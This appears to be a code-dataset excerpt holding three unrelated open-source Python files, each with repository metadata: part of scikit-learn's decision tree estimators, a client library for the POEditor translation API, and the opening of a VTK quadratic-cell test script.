builder.build(self.tree_, X, y, sample_weight)
if self.n_outputs_ == 1:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
return self
def predict(self, X):
"""Predict class or regression value for X.
For a classification model, the predicted class for each sample in X is
returned. For a regression model, the predicted value based on X is
returned.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
y : array of shape = [n_samples] or [n_samples, n_outputs]
The predicted classes, or the predict values.
"""
X = check_array(X, dtype=DTYPE, accept_sparse="csr")
if issparse(X) and (X.indices.dtype != np.intc or
X.indptr.dtype != np.intc):
raise ValueError("No support for np.int64 index based "
"sparse matrices")
n_samples, n_features = X.shape
if self.tree_ is None:
raise NotFittedError("Tree not initialized. Perform a fit first")
if self.n_features_ != n_features:
raise ValueError("Number of features of the model must "
" match the input. Model n_features is %s and "
" input n_features is %s "
% (self.n_features_, n_features))
proba = self.tree_.predict(X)
# Classification
if isinstance(self, ClassifierMixin):
if self.n_outputs_ == 1:
return self.classes_.take(np.argmax(proba, axis=1), axis=0)
else:
predictions = np.zeros((n_samples, self.n_outputs_))
for k in range(self.n_outputs_):
predictions[:, k] = self.classes_[k].take(
np.argmax(proba[:, k], axis=1),
axis=0)
return predictions
# Regression
else:
if self.n_outputs_ == 1:
return proba[:, 0]
else:
return proba[:, :, 0]
@property
def feature_importances_(self):
"""Return the feature importances.
The importance of a feature is computed as the (normalized) total
reduction of the criterion brought by that feature.
It is also known as the Gini importance.
Returns
-------
feature_importances_ : array, shape = [n_features]
"""
if self.tree_ is None:
raise NotFittedError("Estimator not fitted, call `fit` before"
" `feature_importances_`.")
return self.tree_.compute_feature_importances()
# =============================================================================
# Public estimators
# =============================================================================
class DecisionTreeClassifier(BaseDecisionTree, ClassifierMixin):
"""A decision tree classifier.
Parameters
----------
criterion : string, optional (default="gini")
The function to measure the quality of a split. Supported criteria are
"gini" for the Gini impurity and "entropy" for the information gain.
splitter : string, optional (default="best")
The strategy used to choose the split at each node. Supported
strategies are "best" to choose the best split and "random" to choose
the best random split.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=sqrt(n_features)`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_depth : int or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
Ignored if ``max_leaf_nodes`` is not None.
min_samples_split : int, optional (default=2)
The minimum number of samples required to split an internal node.
min_samples_leaf : int, optional (default=1)
The minimum number of samples required to be at a leaf node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
max_leaf_nodes : int or None, optional (default=None)
Grow a tree with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
If not None then ``max_depth`` will be ignored.
class_weight : dict, list of dicts, "auto" or None, optional
(default=None)
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
The "auto" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data.
For multi-output, the weights of each column of y will be multiplied.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
tree_ : Tree object
The underlying Tree object.
max_features_ : int,
The infered value of max_features.
classes_ : array of shape = [n_classes] or a list of such arrays
The classes labels (single output problem),
or a list of arrays of class labels (multi-output problem).
n_classes_ : int or list
The number of classes (for single output problems),
or a list containing the number of classes for each
output (for multi-output problems).
feature_importances_ : array of shape = [n_features]
The feature importances. The higher, the more important the
feature. The importance of a feature is computed as the (normalized)
total reduction of the criterion brought by that feature. It is also
known as the Gini importance [4]_.
See also
--------
DecisionTreeRegressor
References
----------
.. [1] http://en.wikipedia.org/wiki/Decision_tree_learning
.. [2] L. Breiman, J. Friedman, R. Olshen, and C. Stone, "Classification
and Regression Trees", Wadsworth, Belmont, CA, 1984.
.. [3] T. Hastie, R. Tibshirani and J. Friedman. "Elements of Statistical
Learning", Springer, 2009.
.. [4] L. Breiman, and A. Cutler, "Random Forests",
http://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm
Examples
--------
>>> from sklearn.datasets import load_iris
>>> from sklearn.cross_validation import cross_val_score
>>> from sklearn.tree import DecisionTreeClassifier
>>> clf = DecisionTreeClassifier(random_state=0)
>>> iris = load_iris()
>>> cross_val_score(clf, iris.data, iris.target, cv=10)
... # doctest: +SKIP
...
array([ 1. , 0.93..., 0.86..., 0.93..., 0.93...,
0.93..., 0.93..., 1. , 0.93..., 1. ])
"""
def __init__(self,
criterion="gini",
splitter="best",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features=None,
random_state=None,
max_leaf_nodes=None,
class_weight=None):
super(DecisionTreeClassifier, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
class_weight=class_weight,
random_state=random_state)
def predict_proba(self, X):
"""Predict class probabilities of the input samples X.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
check_is_fitted(self, 'n_outputs_')
X = check_array(X, dtype=DTYPE, accept_sparse="csr")
if issparse(X) and (X.indices.dtype != np.intc or
X.indptr.dtype != np.intc):
raise ValueError("No support for np.int64 index based "
"sparse matrices")
n_samples, n_features = X.shape
if self.tree_ is None:
raise NotFittedError("Tree not initialized. Perform a fit first.")
if self.n_features_ != n_features:
raise ValueError("Number of features of the model must "
" match the input. Model n_features is %s and "
" input n_features is %s "
% (self.n_features_, n_features))
proba = self.tree_.predict(X)
if self.n_outputs_ == 1:
proba = proba[:, :self.n_classes_]
normalizer = proba.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba /= normalizer
return proba
else:
all_proba = []
for k in range(self.n_outputs_):
proba_k = proba[:, k, :self.n_classes_[k]]
normalizer = proba_k.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba_k /= normalizer
all_proba.append(proba_k)
return all_proba
def predict_log_proba(self, X):
"""Predict class log-probabilities of the input samples X.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class log-probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return np.log(proba)
else:
for k in range(self.n_outputs_):
proba[k] = np.log(proba[k])
return proba
class DecisionTreeRegressor(BaseDecisionTree, RegressorMixin):
"""A decision tree regressor.
Parameters
----------
criterion : string, optional (default="mse")
The function to measure the quality of a split. The only supported
criterion is "mse" for the mean squared error.
splitter : string, optional (default="best")
The strategy used to choose the split at each node. Supported
strategies are "best" to choose the best split and "random" to choose
the best random split.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_depth : int or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
Ignored if ``max_leaf_nodes`` is not None.
min_samples_split : int, optional (default=2)
The minimum number of samples required to split an internal node.
min_samples_leaf : int, optional (default=1)
The minimum number of samples required to be at a leaf node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
max_leaf_nodes : int or None, optional (default=None)
Grow a tree with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
If not None then ``max_depth`` will be ignored.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
tree_ : Tree object
The underlying Tree object.
max_features_ : int,
The infered value of max_features.
feature_importances_ : array of shape = [n_features]
The feature importances.
The higher, the more important the feature.
The importance of a feature is computed as the
(normalized) total reduction of the criterion brought
by that feature. It is also known as the Gini importance [4]_.
See also
--------
DecisionTreeClassifier
References
----------
.. [1] http://en.wikipedia.org/wiki/Decision_tree_learning
.. [2] L. Breiman, J. Friedman, R. Olshen, and C. Stone, "Classification
and Regression Trees", Wadsworth, Belmont, CA, 1984.
.. [3] T. Hastie, R. Tibshirani and J. Friedman. "Elements of Statistical
Learning", Springer, 2009.
.. [4] L. Breiman, and A. Cutler, "Random Forests",
http://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm
Examples
--------
>>> from sklearn.datasets import load_boston
>>> from sklearn.cross_validation import cross_val_score
>>> from sklearn.tree import DecisionTreeRegressor
>>> boston = load_boston()
>>> regressor = DecisionTreeRegressor(random_state=0)
>>> cross_val_score(regressor, boston.data, boston.target, cv=10)
... # doctest: +SKIP
...
array([ 0.61..., 0.57..., -0.34..., 0.41..., 0.75...,
0.07..., 0.29..., 0.33..., -1.42..., -1.77...])
"""
def __init__(self,
criterion="mse",
splitter="best",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features=None,
random_state=None,
max_leaf_nodes=None):
super(DecisionTreeRegressor, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
random_state=random_state)
class ExtraTreeClassifier(DecisionTreeClassifier):
"""An extremely randomized tree classifier.
Extra-trees differ from classic decision trees in the way they are built.
When looking for the best split to separate the samples of a node into two
groups, random splits are drawn for each of the `max_features` randomly
selected features and the best split among those is chosen. When
`max_features` is set 1, this amounts to building a totally random
decision tree.
Warning: Extra-trees should only be used within ensemble methods.
See also
--------
ExtraTreeRegressor, ExtraTreesClassifier, ExtraTreesRegressor
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
"""
def __init__(self,
criterion="gini",
splitter="random",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
random_state=None,
max_leaf_nodes=None,
class_weight=None):
super(ExtraTreeClassifier, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
class_weight=class_weight,
random_state=random_state)
class ExtraTreeRegressor(DecisionTreeRegressor):
"""An extremely randomized tree regressor.
Extra-trees differ from classic decision trees in the way they are built.
When looking for the best split to separate the samples of a node into two
groups, random splits are drawn for each of the `max_features` randomly
selected features and the best split among those is chosen. When
`max_features` is set 1, this amounts to building a totally random
decision tree.
Warning: Extra-trees should only be used within ensemble methods.
See also
--------
ExtraTreeClassifier, ExtraTreesClassifier, ExtraTreesRegressor
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
"""
def __init__(self,
criterion="mse",
splitter="random",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
random_state=None,
max_leaf_nodes=None):
super(ExtraTreeRegressor, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
random_state=random_state)
|
maheshakya/scikit-learn
|
sklearn/tree/tree.py
|
Python
|
bsd-3-clause
| 34,714
|
[
"Brian"
] |
6ab1424dd0e6516e49feb124ae0aedb456ad932897a056351e339f6c8d9326b7
|
"""
Client Interface for POEditor API (https://poeditor.com).
Usage:
>>> from poeditor import POEditorAPI
>>> client = POEditorAPI(api_token='my_token')
>>> projects = client.list_projects()
"""
import json
import requests
import sys
import tempfile
import warnings
from datetime import datetime
__all__ = ['POEditorException', 'POEditorArgsException', 'POEditorAPI']
if sys.version_info < (3, 2):
from datetime import timedelta
def parse_datetime(dt_string):
# Hacky and not really equivalent to the Python3.2 version but will do for most use cases,
# that way we can avoid adding an extra dependency like dateutil or iso8601
ret = datetime.strptime(dt_string[:19], '%Y-%m-%dT%H:%M:%S')
if dt_string[19] == '+':
ret -= timedelta(hours=int(dt_string[20:22]), minutes=int(dt_string[22:]))
elif dt_string[19] == '-':
ret += timedelta(hours=int(dt_string[20:22]), minutes=int(dt_string[22:]))
return ret
else:
# https://docs.python.org/3/whatsnew/3.2.html#datetime-and-time
def parse_datetime(dt_string):
return datetime.strptime(dt_string, '%Y-%m-%dT%H:%M:%S%z')
class POEditorException(Exception):
"""
POEditor API exception
"""
def __init__(self, error_code, status, message):
self.exp = 'POEditorException'
self.error_code = error_code
self.message = "Status '{}', code {}: {}".format(
status, error_code, message)
super(POEditorException, self).__init__()
def __str__(self):
return self.message
class POEditorArgsException(Exception):
"""
POEditor args method exception
"""
def __init__(self, message):
self.exp = 'POEditorArgsException'
self.message = message
super(POEditorArgsException, self).__init__()
class POEditorAPI(object):
"""
Connect your software to POEditor with its simple API
Please refers to https://poeditor.com/docs/api if you have questions
"""
HOST = "https://api.poeditor.com/v2/"
SUCCESS_CODE = "success"
FILE_TYPES = ['po', 'pot', 'mo', 'xls', 'csv', 'resx', 'resw', 'android_strings',
'apple_strings', 'xliff', 'properties', 'key_value_json', 'json',
'xmb', 'xtb']
FILTER_BY = ['translated', 'untranslated', 'fuzzy', 'not_fuzzy',
'automatic', 'not_automatic', 'proofread', 'not_proofread']
UPDATING_TERMS = 'terms'
UPDATING_TERMS_TRANSLATIONS = 'terms_translations'
UPDATING_TRANSLATIONS = 'translations'
# in seconds. Upload: No more than one request every 30 seconds
MIN_UPLOAD_INTERVAL = 30
def __init__(self, api_token):
"""
All requests to the API must contain the parameter api_token.
You'll find it in My Account > API Access in your POEditor account.
"""
self.api_token = api_token
def _construct_url(self, path):
return '{}{}'.format(self.HOST, path)
def _make_request(self, url, payload, headers=None):
kwargs = {}
if payload.get('file'):
kwargs['files'] = {'file': payload.pop('file')}
response = requests.post(url, data=payload, headers=headers, **kwargs)
if response.status_code != 200:
raise POEditorException(
status='fail',
error_code=response.status_code,
message=response.reason
)
data = response.json()
if 'response' not in data:
raise POEditorException(
status='fail',
error_code=-1,
message='"response" key is not present'
)
if 'status' in data['response'] and \
data['response']['status'] != self.SUCCESS_CODE:
raise POEditorException(
error_code=data['response'].get('code'),
status=data['response']['status'],
message=data['response'].get('message')
)
return data
def _run(self, url_path, headers=None, **kwargs):
"""
Requests API
"""
url = self._construct_url(url_path)
payload = kwargs
payload.update({'api_token': self.api_token})
return self._make_request(url, payload, headers)
def _apiv1_run(self, action, headers=None, **kwargs):
"""
Kept for backwards compatibility of this client
See "self.clear_reference_language"
"""
warnings.warn(
"POEditor API v1 is deprecated. Use POEditorAPI._run method to call API v2",
DeprecationWarning, stacklevel=2
)
url = "https://poeditor.com/api/"
payload = kwargs
payload.update({'action': action, 'api_token': self.api_token})
return self._make_request(url, payload, headers)
def _project_formatter(self, data):
"""
Project object
"""
open_ = False if not data['open'] or data['open'] == '0' else True
public = False if not data['public'] or data['public'] == '0' else True
output = {
'created': parse_datetime(data['created']),
'id': int(data['id']),
'name': data['name'],
'open': open_,
'public': public,
}
# the detail view returns more info than the list view
# see https://poeditor.com/docs/api#projects_view
for key in ['description', 'reference_language', 'terms']:
if key in data:
output[key] = data[key]
return output
def list_projects(self):
"""
Returns the list of projects owned by user.
"""
data = self._run(
url_path="projects/list"
)
projects = data['result'].get('projects', [])
return [self._project_formatter(item) for item in projects]
def create_project(self, name, description=None):
"""
creates a new project. Returns the id of the project (if successful)
"""
description = description or ''
data = self._run(
url_path="projects/add",
name=name,
description=description
)
return data['result']['project']['id']
def update_project(self, project_id, name=None, description=None,
reference_language=None):
"""
Updates project settings (name, description, reference language)
If optional parameters are not sent, their respective fields are not updated.
"""
kwargs = {}
if name is not None:
kwargs['name'] = name
if description is not None:
kwargs['description'] = description
if reference_language is not None:
kwargs['reference_language'] = reference_language
data = self._run(
url_path="projects/update",
id=project_id,
**kwargs
)
return data['result']['project']['id']
def delete_project(self, project_id):
"""
Deletes the project from the account.
You must be the owner of the project.
"""
self._run(
url_path="projects/delete",
id=project_id,
)
return True
def view_project_details(self, project_id):
"""
Returns project's details.
"""
data = self._run(
url_path="projects/view",
id=project_id
)
return self._project_formatter(data['result']['project'])
def list_project_languages(self, project_id):
"""
Returns project languages, percentage of translation done for each and the
datetime (UTC - ISO 8601) when the last change was made.
"""
data = self._run(
url_path="languages/list",
id=project_id
)
return data['result'].get('languages', [])
def add_language_to_project(self, project_id, language_code):
"""
Adds a new language to project
"""
self._run(
url_path="languages/add",
id=project_id,
language=language_code
)
return True
def delete_language_from_project(self, project_id, language_code):
"""
Deletes existing language from project
"""
self._run(
url_path="languages/delete",
id=project_id,
language=language_code
)
return True
def set_reference_language(self, project_id, language_code):
"""
Sets a reference language to project
"""
return self.update_project(project_id, reference_language=language_code)
def clear_reference_language(self, project_id):
"""
Clears reference language from project
Could not find how to reproduce the "clear_reference_language" v1 action with the v2 API.
Calling v2 projects/update with reference_language='' or reference_language=None did not work.
https://poeditor.com/docs/api#projects_update
"""
self._apiv1_run(
action="clear_reference_language",
id=project_id
)
return True
def view_project_terms(self, project_id, language_code=None):
"""
Returns project's terms and translations if the argument language is provided.
"""
data = self._run(
url_path="terms/list",
id=project_id,
language=language_code
)
return data['result'].get('terms', [])
def add_terms(self, project_id, data):
"""
Adds terms to project.
>>> data = [
{
"term": "Add new list",
"context": "",
"reference": "\/projects",
"plural": "",
"comment": ""
},
{
"term": "one project found",
"context": "",
"reference": "\/projects",
"plural": "%d projects found",
"comment": "Make sure you translate the plural forms",
"tags": [
"first_tag",
"second_tag"
]
},
{
"term": "Show all projects",
"context": "",
"reference": "\/projects",
"plural": "",
"tags": "just_a_tag"
}
]
"""
data = self._run(
url_path="terms/add",
id=project_id,
data=json.dumps(data)
)
return data['result']['terms']
def update_terms(self, project_id, data, fuzzy_trigger=None):
"""
Updates project terms. Lets you change the text, context, reference, plural and tags.
>>> data = [
{
"term": "Add new list",
"context": "",
"new_term": "Save list",
"new_context": "",
"reference": "\/projects",
"plural": "",
"comment": "",
"tags": [
"first_tag",
"second_tag"
]
},
{
"term": "Display list",
"context": "",
"new_term": "Show list",
"new_context": ""
}
]
"""
kwargs = {}
if fuzzy_trigger is not None:
kwargs['fuzzy_trigger'] = fuzzy_trigger
data = self._run(
url_path="terms/update",
id=project_id,
data=json.dumps(data),
**kwargs
)
return data['result']['terms']
def delete_terms(self, project_id, data):
"""
Deletes terms from project.
>>> data = [
{
"term": "one project found",
"context": ""
},
{
"term": "Show all projects",
"context": "form"
}
]
"""
data = self._run(
url_path="terms/delete",
id=project_id,
data=json.dumps(data)
)
return data['result']['terms']
def add_comment(self, project_id, data):
"""
Adds comments to existing terms.
>>> data = [
{
"term": "Add new list",
"context": "",
"comment": "This is a button"
},
{
"term": "one project found",
"context": "",
"comment": "Make sure you translate the plural forms"
},
{
"term": "Show all projects",
"context": "",
"comment": "This is a button"
}
]
"""
data = self._run(
url_path="terms/add_comment",
id=project_id,
data=json.dumps(data)
)
return data['result']['terms']
def sync_terms(self, project_id, data):
"""
Syncs your project with the array you send (terms that are not found
in the dict object will be deleted from project and the new ones
added).
Please use with caution. If wrong data is sent, existing terms and their
translations might be irreversibly lost.
>>> data = [
{
"term": "Add new list",
"context": "",
"reference": "\/projects",
"plural": "",
"comment": ""
},
{
"term": "one project found",
"context": "",
"reference": "\/projects",
"plural": "%d projects found",
"comment": "Make sure you translate the plural forms",
"tags": [
"first_tag",
"second_tag"
]
},
{
"term": "Show all projects",
"context": "",
"reference": "\/projects",
"plural": "",
"tags": "just_a_tag"
}
]
"""
data = self._run(
url_path="projects/sync",
id=project_id,
data=json.dumps(data)
)
return data['result']['terms']
def update_project_language(self, project_id, language_code, data, fuzzy_trigger=None):
"""
Inserts / overwrites translations.
>>> data = [
{
"term": "Projects",
"context": "project list",
"translation": {
"content": "Des projets",
"fuzzy": 0
}
}
]
"""
kwargs = {}
if fuzzy_trigger is not None:
kwargs['fuzzy_trigger'] = fuzzy_trigger
data = self._run(
url_path="languages/update",
id=project_id,
language=language_code,
data=json.dumps(data),
**kwargs
)
return data['result']['translations']
def export(self, project_id, language_code, file_type='po', filters=None,
tags=None, local_file=None):
"""
Return terms / translations
filters - filter by self._filter_by
tags - filter results by tags;
local_file - save content into it. If None, save content into
random temp file.
>>> tags = 'name-of-tag'
>>> tags = ["name-of-tag"]
>>> tags = ["name-of-tag", "name-of-another-tag"]
>>> filters = 'translated'
>>> filters = ["translated"]
>>> filters = ["translated", "not_fuzzy"]
"""
if file_type not in self.FILE_TYPES:
raise POEditorArgsException(
'content_type: file format {}'.format(self.FILE_TYPES))
if filters and isinstance(filters, str) and filters not in self.FILTER_BY:
raise POEditorArgsException(
"filters - filter results by {}".format(self.FILTER_BY))
elif filters and set(filters).difference(set(self.FILTER_BY)):
raise POEditorArgsException(
"filters - filter results by {}".format(self.FILTER_BY))
data = self._run(
url_path="projects/export",
id=project_id,
language=language_code,
type=file_type,
filters=filters,
tags=tags
)
# The link of the file (expires after 10 minutes).
file_url = data['result']['url']
# Download file content:
res = requests.get(file_url, stream=True)
if not local_file:
tmp_file = tempfile.NamedTemporaryFile(
delete=False, suffix='.{}'.format(file_type))
tmp_file.close()
local_file = tmp_file.name
with open(local_file, 'w+b') as po_file:
for data in res.iter_content(chunk_size=1024):
po_file.write(data)
return file_url, local_file
def _upload(self, project_id, updating, file_path, language_code=None,
overwrite=False, sync_terms=False, tags=None, fuzzy_trigger=None):
"""
Internal: updates terms / translations
File uploads are limited to one every 30 seconds
"""
options = [
self.UPDATING_TERMS,
self.UPDATING_TERMS_TRANSLATIONS,
self.UPDATING_TRANSLATIONS
]
if updating not in options:
raise POEditorArgsException(
'Updating arg must be in {}'.format(options)
)
options = [
self.UPDATING_TERMS_TRANSLATIONS,
self.UPDATING_TRANSLATIONS
]
if language_code is None and updating in options:
raise POEditorArgsException(
'Language code is required only if updating is '
'terms_translations or translations)'
)
if updating == self.UPDATING_TRANSLATIONS:
tags = None
sync_terms = None
# Special content type:
tags = tags or ''
language_code = language_code or ''
sync_terms = '1' if sync_terms else '0'
overwrite = '1' if overwrite else '0'
fuzzy_trigger = '1' if fuzzy_trigger else '0'
project_id = str(project_id)
with open(file_path, 'r+b') as local_file:
data = self._run(
url_path="projects/upload",
id=project_id,
language=language_code,
file=local_file,
updating=updating,
tags=tags,
sync_terms=sync_terms,
overwrite=overwrite,
fuzzy_trigger=fuzzy_trigger
)
return data['result']
def update_terms(self, project_id, file_path=None, language_code=None,
overwrite=False, sync_terms=False, tags=None, fuzzy_trigger=None):
"""
Updates terms
overwrite: set it to True if you want to overwrite translations
sync_terms: set it to True if you want to sync your terms (terms that
are not found in the uploaded file will be deleted from project
and the new ones added). Ignored if updating = translations
tags: Add tags to the project terms; available when updating terms or terms_translations;
you can use the following keys: "all" - for the all the imported terms, "new" - for
the terms which aren't already in the project, "obsolete" - for the terms which are
in the project but not in the imported file and "overwritten_translations" - for the
terms for which translations change
fuzzy_trigger: set it to True to mark corresponding translations from the
other languages as fuzzy for the updated values
"""
return self._upload(
project_id=project_id,
updating=self.UPDATING_TERMS,
file_path=file_path,
language_code=language_code,
overwrite=overwrite,
sync_terms=sync_terms,
tags=tags,
fuzzy_trigger=fuzzy_trigger
)
def update_terms_definitions(self, project_id, file_path=None,
language_code=None, overwrite=False,
sync_terms=False, tags=None, fuzzy_trigger=None):
warnings.warn(
"This method has been renamed update_terms_translations",
DeprecationWarning, stacklevel=2
)
return self.update_terms_translations(
project_id,
file_path,
language_code,
overwrite,
sync_terms,
tags,
fuzzy_trigger
)
def update_terms_translations(self, project_id, file_path=None,
language_code=None, overwrite=False,
sync_terms=False, tags=None, fuzzy_trigger=None):
"""
Updates terms translations
overwrite: set it to True if you want to overwrite translations
sync_terms: set it to True if you want to sync your terms (terms that
are not found in the uploaded file will be deleted from project
and the new ones added). Ignored if updating = translations
tags: Add tags to the project terms; available when updating terms or terms_translations;
you can use the following keys: "all" - for the all the imported terms, "new" - for
the terms which aren't already in the project, "obsolete" - for the terms which are
in the project but not in the imported file and "overwritten_translations" - for the
terms for which translations change
fuzzy_trigger: set it to True to mark corresponding translations from the
other languages as fuzzy for the updated values
"""
return self._upload(
project_id=project_id,
updating=self.UPDATING_TERMS_TRANSLATIONS,
file_path=file_path,
language_code=language_code,
overwrite=overwrite,
sync_terms=sync_terms,
tags=tags,
fuzzy_trigger=fuzzy_trigger
)
def update_definitions(self, project_id, file_path=None,
language_code=None, overwrite=False, fuzzy_trigger=None):
warnings.warn(
"This method has been renamed update_translations",
DeprecationWarning, stacklevel=2
)
return self.update_translations(
project_id,
file_path,
language_code,
overwrite,
fuzzy_trigger
)
def update_translations(self, project_id, file_path=None,
language_code=None, overwrite=False, fuzzy_trigger=None):
"""
Updates translations
overwrite: set it to True if you want to overwrite definitions
fuzzy_trigger: set it to True to mark corresponding translations from the
other languages as fuzzy for the updated values
"""
return self._upload(
project_id=project_id,
updating=self.UPDATING_TRANSLATIONS,
file_path=file_path,
language_code=language_code,
overwrite=overwrite,
fuzzy_trigger=fuzzy_trigger
)
def available_languages(self):
"""
Returns a comprehensive list of all languages supported by POEditor.
You can find it here (https://poeditor.com/docs/languages), too.
"""
data = self._run(
url_path="languages/available"
)
return data['result'].get('languages', [])
def list_contributors(self, project_id=None, language_code=None):
"""
Returns the list of contributors
"""
data = self._run(
url_path="contributors/list",
id=project_id,
language=language_code
)
return data['result'].get('contributors', [])
def add_contributor(self, project_id, name, email, language_code):
"""
Adds a contributor to a project language
"""
self._run(
url_path="contributors/add",
id=project_id,
name=name,
email=email,
language=language_code
)
return True
def add_administrator(self, project_id, name, email):
"""
Adds a contributor to a project language
"""
self._run(
url_path="contributors/add",
id=project_id,
name=name,
email=email,
admin=True
)
return True
def remove_contributor(self, project_id, email, language):
"""
Removes a contributor
"""
self._run(
url_path="contributors/remove",
id=project_id,
email=email,
language=language
)
return True
|
sporteasy/python-poeditor
|
poeditor/client.py
|
Python
|
mit
| 25,407
|
[
"xTB"
] |
ec289f8aa362f20bb529a6ccdeb9c0d397ad96d5608cbdd5fd79fd0431533fd9
|
#!/usr/bin/env python
import sys
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Prevent .pyc files being created.
# Stops the vtk source being polluted
# by .pyc files.
sys.dont_write_bytecode = True
import backdrop
# Contour every quadratic cell type
# Create a scene with one of each cell type.
# QuadraticEdge
edgePoints = vtk.vtkPoints()
edgePoints.SetNumberOfPoints(3)
edgePoints.InsertPoint(0, 0, 0, 0)
edgePoints.InsertPoint(1, 1.0, 0, 0)
edgePoints.InsertPoint(2, 0.5, 0.25, 0)
edgeScalars = vtk.vtkFloatArray()
edgeScalars.SetNumberOfTuples(3)
edgeScalars.InsertValue(0, 0.0)
edgeScalars.InsertValue(1, 0.0)
edgeScalars.InsertValue(2, 0.9)
aEdge = vtk.vtkQuadraticEdge()
aEdge.GetPointIds().SetId(0, 0)
aEdge.GetPointIds().SetId(1, 1)
aEdge.GetPointIds().SetId(2, 2)
aEdgeGrid = vtk.vtkUnstructuredGrid()
aEdgeGrid.Allocate(1, 1)
aEdgeGrid.InsertNextCell(aEdge.GetCellType(), aEdge.GetPointIds())
aEdgeGrid.SetPoints(edgePoints)
aEdgeGrid.GetPointData().SetScalars(edgeScalars)
aEdgeMapper = vtk.vtkDataSetMapper()
aEdgeMapper.SetInputData(aEdgeGrid)
aEdgeMapper.ScalarVisibilityOff()
aEdgeActor = vtk.vtkActor()
aEdgeActor.SetMapper(aEdgeMapper)
aEdgeActor.GetProperty().SetRepresentationToWireframe()
aEdgeActor.GetProperty().SetAmbient(1.0)
# Quadratic triangle
triPoints = vtk.vtkPoints()
triPoints.SetNumberOfPoints(6)
triPoints.InsertPoint(0, 0.0, 0.0, 0.0)
